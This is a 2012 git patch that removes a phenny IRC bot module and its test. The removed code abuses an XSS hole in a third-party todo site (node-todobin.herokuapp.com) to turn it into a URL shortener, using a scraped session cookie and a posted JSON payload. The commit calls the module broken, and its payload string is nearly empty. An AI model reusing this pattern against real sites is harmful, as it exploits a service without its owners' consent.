From f8e2afbb9d8ee1cf6afee5c6dfae5eec2a533a1a Mon Sep 17 00:00:00 2001
From: mutantmonkey
Date: Wed, 5 Dec 2012 15:17:04 -0500
Subject: [PATCH] remove broken nodetodo module
---
 modules/nodetodo.py | 69 -----------------------------------
 modules/test/test_nodetodo.py | 23 ------------
 2 files changed, 92 deletions(-)
 delete mode 100644 modules/nodetodo.py
 delete mode 100644 modules/test/test_nodetodo.py
diff --git a/modules/nodetodo.py b/modules/nodetodo.py
deleted file mode 100644
index 686c16e..0000000
--- a/modules/nodetodo.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/python3
-"""
-nodetodo.py - node-todo uploader
-author: mutantmonkey
-author: telnoratti
-"""
-
-from urllib.error import HTTPError
-from urllib import request
-from tools import GrumbleError
-import web
-import json
-
-def xss(phenny, input):
- """.xss - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
-
- url = input.group(2)
- if not url:
- phenny.reply("No URL provided.")
- return
-
- if not url.startswith('http'):
- url = ''.join(['http://', url])
-
- try:
- url = urlshortener(url)
- except (HTTPError, IOError):
- raise GrumbleError("THE INTERNET IS FUCKING BROKEN. Please try again later.")
-
- phenny.reply(url)
-xss.rule = (['xss'], r'(.*)')
-
-
-
-def urlshortener(longurl):
- xss = ''.join(["""{"status":false,"text":""}"""])
- xss = xss.encode()
- r = request.urlopen('http://node-todobin.herokuapp.com/list')
- cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
-
- r = request.Request('http://node-todobin.herokuapp.com/api/todos',
- headers={
- 'Content-Type': 'application/json',
- 'Accept': 'application/json, text/javascript, */*',
- 'Cookie': cookie,
- }, data=b'{"id":null}')
- opener = request.build_opener(request.HTTPHandler)
- response = opener.open(r)
- data = response.read()
- js = json.loads(data.decode('utf-8'))
- uri = js.get('uri')
- url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
- newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
-
- request.urlopen(url)
- request.urlopen(newurl)
- r = request.Request(url,
- headers={
- 'Content-Type': 'application/json',
- 'Accept': 'application/json, text/javascript, */*',
- 'Cookie': cookie,
- }, data=xss)
-
- opener.open(r)
-
- return newurl
-
-if __name__ == '__main__':
- print(__doc__.strip())
diff --git a/modules/test/test_nodetodo.py b/modules/test/test_nodetodo.py
deleted file mode 100644
index 31b9ea3..0000000
--- a/modules/test/test_nodetodo.py
+++ /dev/null
@@ -1,23 +0,0 @@
-"""
-test_nodetodo.py - tests for the node-todo xss module
-author: mutantmonkey
-"""
-
-import re
-import unittest
-from mock import MagicMock, Mock
-from modules.nodetodo import xss, urlshortener
-
-
-class TestNodeTodo(unittest.TestCase):
- def setUp(self):
- self.phenny = MagicMock()
-
- def test_xss(self):
- input = Mock(group=lambda x: 'http://vtluug.org/')
- xss(self.phenny, input)
-
- out = self.phenny.reply.call_args[0][0]
- m = re.match('^http://node-todobin\.herokuapp\.com/list/[a-z0-9]+$',
- out, flags=re.UNICODE)
- self.assertTrue(m)